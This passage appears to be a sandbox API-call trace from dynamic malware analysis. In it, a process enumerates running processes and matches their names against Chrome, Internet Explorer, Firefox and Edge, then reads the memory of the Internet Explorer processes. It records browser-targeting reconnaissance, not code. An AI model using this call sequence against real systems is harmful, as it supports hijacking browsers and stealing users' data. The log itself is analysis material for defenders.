	[0216.999] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0216.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0216.999] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.000] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0217.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.000] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.000] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0217.001] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x4a44
	[0217.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.001] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0217.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.001] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.002] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0217.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.002] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.002] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0217.003] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x4a48
	[0217.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.003] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0217.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.004] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.004] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0217.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.005] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.005] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0217.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x4a4c
	[0217.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.006] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0217.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.006] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.006] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0217.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.007] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.007] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0217.007] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x4a50
	[0217.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.007] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0217.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.008] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.008] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0217.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.009] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.009] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0217.010] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x4a54
	[0217.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.010] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0217.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.010] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.011] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0217.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.011] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.011] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0217.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x4a58
	[0217.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.012] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0217.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.013] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.013] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0217.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.013] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0217.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x4a5c
	[0217.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.014] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0217.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.014] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.015] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0217.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.015] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.015] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0217.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x4a60
	[0217.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.016] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0217.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.016] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.017] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0217.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.017] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.018] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0217.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x4a64
	[0217.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.018] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0217.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.019] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.019] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0217.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.020] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.020] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0217.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x4a68
	[0217.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.021] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0217.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.022] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.022] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0217.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.023] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.023] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0217.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x4a6c
	[0217.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.024] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0217.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.024] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.025] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0217.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.026] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.026] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0217.027] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x4a70
	[0217.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.027] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0217.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.027] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.075] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0217.075] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.075] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.076] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0217.076] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x4a74
	[0217.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.077] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0217.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.077] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0217.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.077] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0217.077] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.077] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.078] NtQueryInformationProcess (in: ProcessHandle=0x4a74, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0217.078] ReadProcessMemory (in: hProcess=0x4a74, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0217.078] ReadProcessMemory (in: hProcess=0x4a74, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0217.078] ReadProcessMemory (in: hProcess=0x4a74, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0217.078] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0217.078] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0217.079] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x4a78
	[0217.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.079] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0217.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.079] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0217.079] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.080] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0217.080] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.080] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.080] NtQueryInformationProcess (in: ProcessHandle=0x4a78, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0217.080] ReadProcessMemory (in: hProcess=0x4a78, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0217.080] ReadProcessMemory (in: hProcess=0x4a78, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0217.080] ReadProcessMemory (in: hProcess=0x4a78, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0217.080] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0217.081] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0217.081] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x4a7c
	[0217.081] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.081] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0217.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.082] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.082] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0217.082] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.082] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.082] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0217.083] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4a80
	[0217.083] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.083] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0217.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.084] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.084] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0217.084] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.084] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.084] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.085] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4a84
	[0217.085] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.085] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0217.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.086] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.086] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0217.086] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.086] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.086] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.087] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.088] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4a88
	[0217.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.088] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0217.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.088] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.088] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.088] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0217.089] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.089] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.089] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0217.090] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4a8c
	[0217.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.090] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0217.090] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.090] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.091] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0217.091] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.091] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.091] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0217.092] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4a90
	[0217.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.092] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0217.092] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.092] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0217.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.093] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0217.093] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0217.093] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0217.093] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0217.094] CloseHandle (hObject=0x188) returned 1
	[0217.094] Sleep (dwMilliseconds=0x64) 
	[0218.705] GetCurrentProcessId () returned 0x110
	[0218.705] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0218.708] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0218.708] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0218.709] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0218.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4a94
	[0218.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.710] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0218.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.710] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0218.710] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.710] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0218.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
